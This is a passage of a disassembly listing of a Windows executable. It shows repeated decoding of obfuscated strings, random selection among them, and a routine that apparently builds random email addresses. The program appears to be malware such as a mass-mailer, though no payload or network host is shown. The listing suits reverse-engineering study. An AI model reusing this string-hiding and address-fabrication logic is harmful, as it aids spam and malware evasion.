; ---------------------------------------------------------------------------
loc_40D2A4: ; CODE XREF: sub_40D270+1C�j
push 5
push (offset locret_429807+1)
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_804]
lea esp, [esp+0]
loc_40D2C0: ; CODE XREF: sub_40D270+58�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D2C0
push 5
push offset dword_429810
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_7E4]
nop
loc_40D2E0: ; CODE XREF: sub_40D270+78�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D2E0
push 6
push offset dword_429818
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_7C4]
nop
loc_40D300: ; CODE XREF: sub_40D270+98�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D300
push 4
push offset dword_429820
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_7A4]
nop
loc_40D320: ; CODE XREF: sub_40D270+B8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D320
push 5
push offset dword_429824
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_784]
loc_40D342: ; CODE XREF: sub_40D270+DA�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D342
push 7
push offset dword_42982C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_764]
loc_40D364: ; CODE XREF: sub_40D270+FC�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D364
push 8
push offset dword_429834
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_744]
loc_40D386: ; CODE XREF: sub_40D270+11E�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D386
push 4
push offset dword_42983C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_724]
loc_40D3A8: ; CODE XREF: sub_40D270+140�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D3A8
push 7
push offset dword_429840
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_704]
lea ebx, [ebx+0]
loc_40D3D0: ; CODE XREF: sub_40D270+168�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D3D0
push 5
push offset dword_429848
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_6E4]
loc_40D3F2: ; CODE XREF: sub_40D270+18A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D3F2
push 4
push offset loc_429850
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_6C4]
loc_40D414: ; CODE XREF: sub_40D270+1AC�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D414
push 4
push (offset locret_429852+2)
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_6A4]
loc_40D436: ; CODE XREF: sub_40D270+1CE�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D436
push 5
push offset dword_429858
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_684]
loc_40D458: ; CODE XREF: sub_40D270+1F0�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D458
push 0Ah
push offset dword_429860
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_664]
lea ebx, [ebx+0]
loc_40D480: ; CODE XREF: sub_40D270+218�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D480
push 7
push (offset loc_429867+5)
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_644]
loc_40D4A2: ; CODE XREF: sub_40D270+23A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D4A2
push 5
push (offset loc_429873+1)
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_624]
loc_40D4C4: ; CODE XREF: sub_40D270+25C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D4C4
push 7
push (offset loc_42987B+1)
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_604]
loc_40D4E6: ; CODE XREF: sub_40D270+27E�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D4E6
push 5
push offset loc_429884
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_5E4]
loc_40D508: ; CODE XREF: sub_40D270+2A0�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D508
push 4
push offset loc_42988C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_5C4]
lea ebx, [ebx+0]
loc_40D530: ; CODE XREF: sub_40D270+2C8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D530
push 6
push offset loc_429890
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_5A4]
loc_40D552: ; CODE XREF: sub_40D270+2EA�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D552
push 8
push offset dword_429898
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_584]
loc_40D574: ; CODE XREF: sub_40D270+30C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D574
push 6
push offset dword_4298A0
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_564]
loc_40D596: ; CODE XREF: sub_40D270+32E�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D596
push 7
push offset dword_4298A8
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_544]
loc_40D5B8: ; CODE XREF: sub_40D270+350�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D5B8
push 7
push offset dword_4298B0
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_524]
lea ebx, [ebx+0]
loc_40D5E0: ; CODE XREF: sub_40D270+378�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D5E0
push 6
push offset dword_4298B8
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_504]
loc_40D602: ; CODE XREF: sub_40D270+39A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D602
push 6
push offset dword_4298C0
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_4E4]
loc_40D624: ; CODE XREF: sub_40D270+3BC�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D624
push 4
push offset dword_4298C8
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_4C4]
loc_40D646: ; CODE XREF: sub_40D270+3DE�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D646
push 6
push offset dword_4298CC
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_4A4]
loc_40D668: ; CODE XREF: sub_40D270+400�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D668
push 5
push offset dword_4298D4
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_484]
lea ebx, [ebx+0]
loc_40D690: ; CODE XREF: sub_40D270+428�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D690
push 5
push offset dword_4298DC
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_464]
loc_40D6B2: ; CODE XREF: sub_40D270+44A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D6B2
push 7
push offset dword_4298E4
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+808h+var_444]
loc_40D6D4: ; CODE XREF: sub_40D270+46C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D6D4
call sub_419853
cdq
mov ecx, 1Fh
idiv ecx
shl edx, 5
lea eax, [esp+edx+808h+var_804]
mov edx, esi
sub edx, eax
loc_40D6F6: ; CODE XREF: sub_40D270+48E�j
mov cl, [eax]
mov [eax+edx], cl
inc eax
test cl, cl
jnz short loc_40D6F6
mov ecx, [esp+808h+var_4]
mov eax, 1
pop esi
call sub_4192B6
add esp, 804h
retn
sub_40D270 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40D720 proc near ; CODE XREF: sub_407640+135�p
; sub_407640+56F�p
arg_FC = byte ptr 100h
arg_17C = byte ptr 180h
arg_1FC = byte ptr 200h
arg_27C = byte ptr 280h
arg_2FC = byte ptr 300h
arg_37C = byte ptr 380h
arg_3FC = byte ptr 400h
arg_47C = byte ptr 480h
arg_10FC = dword ptr 1100h
arg_1104 = dword ptr 1108h
mov eax, 1104h
call sub_4192D0
mov eax, dword_42A290
mov [esp+arg_10FC], eax
mov eax, [esp+arg_1104]
test eax, eax
push esi
push edi
jz loc_40D8D8
mov edi, offset byte_4243C3
mov esi, eax
mov ecx, 1
xor edx, edx
repe cmpsb
jz loc_40D8D8
lea edx, [esp+8]
sub edx, eax
loc_40D763: ; CODE XREF: sub_40D720+4B�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40D763
lea eax, [esp+8]
push eax
call sub_419A76
add esp, 4
push 0Bh
push offset dword_4298EC
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+8+arg_FC]
loc_40D792: ; CODE XREF: sub_40D720+7A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D792
push 5
push offset dword_4298F8
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+8+arg_17C]
loc_40D7B4: ; CODE XREF: sub_40D720+9C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D7B4
push 8
push offset dword_429900
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+8+arg_1FC]
loc_40D7D6: ; CODE XREF: sub_40D720+BE�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D7D6
push 7
push offset dword_429908
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+8+arg_27C]
loc_40D7F8: ; CODE XREF: sub_40D720+E0�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D7F8
push 5
push offset dword_429910
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+8+arg_2FC]
lea ebx, [ebx+0]
loc_40D820: ; CODE XREF: sub_40D720+108�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D820
push 5
push offset dword_429918
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+8+arg_37C]
loc_40D842: ; CODE XREF: sub_40D720+12A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D842
push 9
push offset dword_429920
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+8+arg_3FC]
loc_40D864: ; CODE XREF: sub_40D720+14C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D864
push 7
push offset dword_42992C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+8+arg_47C]
loc_40D886: ; CODE XREF: sub_40D720+16E�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D886
xor esi, esi
lea edi, [esp+8+arg_FC]
lea esp, [esp+0]
loc_40D8A0: ; CODE XREF: sub_40D720+19C�j
lea ecx, [esp+8]
push edi
push ecx
call sub_4199F0
add esp, 8
test eax, eax
jnz short loc_40D8D8
inc esi
add edi, 80h
cmp esi, 8
jl short loc_40D8A0
pop edi
mov eax, 1
pop esi
mov ecx, [esp+arg_10FC]
call sub_4192B6
add esp, 1104h
retn
; ---------------------------------------------------------------------------
loc_40D8D8: ; CODE XREF: sub_40D720+21�j
; sub_40D720+37�j ...
mov ecx, [esp+8+arg_10FC]
pop edi
xor eax, eax
pop esi
call sub_4192B6
add esp, 1104h
retn
sub_40D720 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40D8F0 proc near ; CODE XREF: sub_407640+14D�p
; sub_407640+583�p
arg_7C = byte ptr 80h
arg_FC = byte ptr 100h
arg_107C = dword ptr 1080h
arg_1084 = dword ptr 1088h
mov eax, 1084h
call sub_4192D0
mov eax, dword_42A290
mov [esp+arg_107C], eax
mov eax, [esp+arg_1084]
test eax, eax
push esi
push edi
jz loc_40D9CF
mov edi, offset byte_4243C3
mov esi, eax
mov ecx, 1
xor edx, edx
repe cmpsb
jz loc_40D9CF
lea edx, [esp+8]
sub edx, eax
loc_40D933: ; CODE XREF: sub_40D8F0+4B�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40D933
lea eax, [esp+8]
push eax
call sub_419A76
add esp, 4
push 8
push offset dword_429934
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+8+arg_7C]
loc_40D962: ; CODE XREF: sub_40D8F0+7A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D962
push 6
push offset dword_42993C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+8+arg_FC]
loc_40D984: ; CODE XREF: sub_40D8F0+9C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D984
xor esi, esi
lea edi, [esp+8+arg_7C]
loc_40D997: ; CODE XREF: sub_40D8F0+C3�j
lea ecx, [esp+8]
push edi
push ecx
call sub_4199F0
add esp, 8
test eax, eax
jnz short loc_40D9CF
inc esi
add edi, 80h
cmp esi, 2
jl short loc_40D997
pop edi
mov eax, 1
pop esi
mov ecx, [esp+arg_107C]
call sub_4192B6
add esp, 1084h
retn
; ---------------------------------------------------------------------------
loc_40D9CF: ; CODE XREF: sub_40D8F0+21�j
; sub_40D8F0+37�j ...
mov ecx, [esp+8+arg_107C]
pop edi
xor eax, eax
pop esi
call sub_4192B6
add esp, 1084h
retn
sub_40D8F0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40D9F0 proc near ; CODE XREF: sub_407F40+50�p
; sub_40A1E0+9B�p
arg_3C = byte ptr 40h
arg_7C = byte ptr 80h
arg_BC = byte ptr 0C0h
arg_FC = byte ptr 100h
arg_13C = byte ptr 140h
arg_17C = byte ptr 180h
arg_1BC = byte ptr 1C0h
arg_1FC = byte ptr 200h
arg_23C = byte ptr 240h
arg_27C = byte ptr 280h
arg_2BC = byte ptr 2C0h
arg_2FC = byte ptr 300h
arg_33C = byte ptr 340h
arg_37C = byte ptr 380h
arg_3BC = byte ptr 3C0h
arg_3FC = byte ptr 400h
arg_43C = byte ptr 440h
arg_47C = byte ptr 480h
arg_4BC = byte ptr 4C0h
arg_4FC = byte ptr 500h
arg_53C = byte ptr 540h
arg_57C = byte ptr 580h
arg_5BC = byte ptr 5C0h
arg_5FC = byte ptr 600h
arg_63C = byte ptr 640h
arg_67C = byte ptr 680h
arg_6BC = byte ptr 6C0h
arg_6FC = byte ptr 700h
arg_73C = byte ptr 740h
arg_77C = byte ptr 780h
arg_7BC = byte ptr 7C0h
arg_7FC = byte ptr 800h
arg_83C = byte ptr 840h
arg_87C = byte ptr 880h
arg_8BC = byte ptr 8C0h
arg_8FC = byte ptr 900h
arg_93C = byte ptr 940h
arg_97C = byte ptr 980h
arg_9BC = byte ptr 9C0h
arg_9FC = byte ptr 0A00h
arg_A3C = byte ptr 0A40h
arg_A7C = byte ptr 0A80h
arg_ABC = byte ptr 0AC0h
arg_AFC = byte ptr 0B00h
arg_B3C = byte ptr 0B40h
arg_B7C = byte ptr 0B80h
arg_BBC = byte ptr 0BC0h
arg_BFC = byte ptr 0C00h
arg_C3C = byte ptr 0C40h
arg_C7C = byte ptr 0C80h
arg_CBC = byte ptr 0CC0h
arg_CFC = byte ptr 0D00h
arg_D3C = byte ptr 0D40h
arg_D7C = byte ptr 0D80h
arg_DBC = byte ptr 0DC0h
arg_DFC = byte ptr 0E00h
arg_E3C = byte ptr 0E40h
arg_E7C = byte ptr 0E80h
arg_EBC = byte ptr 0EC0h
arg_EFC = byte ptr 0F00h
arg_F3C = byte ptr 0F40h
arg_F7C = byte ptr 0F80h
arg_FBC = byte ptr 0FC0h
arg_FFC = dword ptr 1000h
arg_1004 = dword ptr 1008h
mov eax, 1004h
call sub_4192D0
mov eax, dword_42A290
push ebx
mov ebx, [esp+4+arg_1004]
test ebx, ebx
mov [esp+4+arg_FFC], eax
jnz short loc_40DA28
xor eax, eax
pop ebx
mov ecx, [esp+arg_FFC]
call sub_4192B6
add esp, 1004h
retn
; ---------------------------------------------------------------------------
loc_40DA28: ; CODE XREF: sub_40D9F0+20�j
push esi
push edi
xor esi, esi
call sub_419853
cdq
mov ecx, 5
idiv ecx
mov edi, edx
add edi, 3
test edi, edi
jle short loc_40DA5A
loc_40DA42: ; CODE XREF: sub_40D9F0+68�j
call sub_419853
cdq
mov ecx, 1Ah
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_40DA42
loc_40DA5A: ; CODE XREF: sub_40D9F0+50�j
push 0Bh
mov byte ptr [esi+ebx], 40h
push offset dword_429944
mov ecx, offset off_42AE60
mov byte ptr [esi+ebx+1], 0
call sub_406AE0
lea edx, [esp+0Ch]
loc_40DA78: ; CODE XREF: sub_40D9F0+90�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DA78
push 8
push offset dword_429950
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_3C]
loc_40DA97: ; CODE XREF: sub_40D9F0+AF�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DA97
push 12h
push offset dword_429958
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_7C]
lea esp, [esp+0]
loc_40DAC0: ; CODE XREF: sub_40D9F0+D8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DAC0
push 0Eh
push offset dword_42996C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_BC]
loc_40DAE2: ; CODE XREF: sub_40D9F0+FA�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DAE2
push 0Ch
push offset dword_42997C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_FC]
loc_40DB04: ; CODE XREF: sub_40D9F0+11C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DB04
push 0Fh
push offset dword_429988
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_13C]
loc_40DB26: ; CODE XREF: sub_40D9F0+13E�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DB26
push 0Fh
push offset dword_429998
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_17C]
loc_40DB48: ; CODE XREF: sub_40D9F0+160�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DB48
push 0Fh
push offset dword_4299A8
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_1BC]
lea ebx, [ebx+0]
loc_40DB70: ; CODE XREF: sub_40D9F0+188�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DB70
push 0Dh
push offset dword_4299B8
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_1FC]
loc_40DB92: ; CODE XREF: sub_40D9F0+1AA�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DB92
push 0Ah
push offset dword_4299C8
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_23C]
loc_40DBB4: ; CODE XREF: sub_40D9F0+1CC�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DBB4
push 0Dh
push offset dword_4299D4
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_27C]
loc_40DBD6: ; CODE XREF: sub_40D9F0+1EE�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DBD6
push 0Ch
push offset dword_4299E4
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_2BC]
loc_40DBF8: ; CODE XREF: sub_40D9F0+210�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DBF8
push 0Ch
push offset dword_4299F0
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_2FC]
lea ebx, [ebx+0]
loc_40DC20: ; CODE XREF: sub_40D9F0+238�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DC20
push 0Dh
push offset dword_4299FC
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_33C]
loc_40DC42: ; CODE XREF: sub_40D9F0+25A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DC42
push 0Dh
push offset dword_429A0C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_37C]
loc_40DC64: ; CODE XREF: sub_40D9F0+27C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DC64
push 0Ch
push offset dword_429A1C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_3BC]
loc_40DC86: ; CODE XREF: sub_40D9F0+29E�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DC86
push 0Fh
push offset dword_429A28
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_3FC]
loc_40DCA8: ; CODE XREF: sub_40D9F0+2C0�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DCA8
push 10h
push offset dword_429A38
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_43C]
lea ebx, [ebx+0]
loc_40DCD0: ; CODE XREF: sub_40D9F0+2E8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DCD0
push 0Eh
push offset dword_429A48
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_47C]
loc_40DCF2: ; CODE XREF: sub_40D9F0+30A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DCF2
push 0Dh
push offset dword_429A58
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_4BC]
loc_40DD14: ; CODE XREF: sub_40D9F0+32C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DD14
push 0Bh
push offset dword_429A68
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_4FC]
loc_40DD36: ; CODE XREF: sub_40D9F0+34E�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DD36
push 0Bh
push offset dword_429A74
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_53C]
loc_40DD58: ; CODE XREF: sub_40D9F0+370�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DD58
push 0Bh
push offset dword_429A80
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_57C]
lea ebx, [ebx+0]
loc_40DD80: ; CODE XREF: sub_40D9F0+398�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DD80
push 0Ch
push offset dword_429A8C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_5BC]
loc_40DDA2: ; CODE XREF: sub_40D9F0+3BA�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DDA2
push 0Fh
push offset dword_429A98
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_5FC]
loc_40DDC4: ; CODE XREF: sub_40D9F0+3DC�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DDC4
push 9
push offset dword_429AA8
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_63C]
loc_40DDE6: ; CODE XREF: sub_40D9F0+3FE�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DDE6
push 0Ch
push offset dword_429AB4
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_67C]
loc_40DE08: ; CODE XREF: sub_40D9F0+420�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DE08
push 0Eh
push offset loc_429AC0
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_6BC]
lea ebx, [ebx+0]
loc_40DE30: ; CODE XREF: sub_40D9F0+448�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DE30
push 0Fh
push offset dword_429AD0
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_6FC]
loc_40DE52: ; CODE XREF: sub_40D9F0+46A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DE52
push 0Dh
push offset dword_429AE0
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_73C]
loc_40DE74: ; CODE XREF: sub_40D9F0+48C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DE74
push 0Dh
push offset dword_429AF0
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_77C]
loc_40DE96: ; CODE XREF: sub_40D9F0+4AE�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DE96
push 0Fh
push offset dword_429B00
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_7BC]
loc_40DEB8: ; CODE XREF: sub_40D9F0+4D0�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DEB8
push 0Dh
push offset dword_429B10
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_7FC]
lea ebx, [ebx+0]
loc_40DEE0: ; CODE XREF: sub_40D9F0+4F8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DEE0
push 0Ah
push offset loc_429B20
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_83C]
loc_40DF02: ; CODE XREF: sub_40D9F0+51A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DF02
push 0Dh
push offset dword_429B2C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_87C]
loc_40DF24: ; CODE XREF: sub_40D9F0+53C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DF24
push 9
push offset dword_429B3C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_8BC]
loc_40DF46: ; CODE XREF: sub_40D9F0+55E�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DF46
push 10h
push offset dword_429B48
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_8FC]
loc_40DF68: ; CODE XREF: sub_40D9F0+580�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DF68
push 7
push offset dword_429B58
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_93C]
lea ebx, [ebx+0]
loc_40DF90: ; CODE XREF: sub_40D9F0+5A8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DF90
push 0Dh
push offset dword_429B60
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_97C]
loc_40DFB2: ; CODE XREF: sub_40D9F0+5CA�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DFB2
push 0Dh
push offset dword_429B70
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_9BC]
loc_40DFD4: ; CODE XREF: sub_40D9F0+5EC�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DFD4
push 0Ch
push offset dword_429B80
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+0Ch+arg_9FC]
loc_40DFF6: ; CODE XREF: sub_40D9F0+60E�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40DFF6
push 8
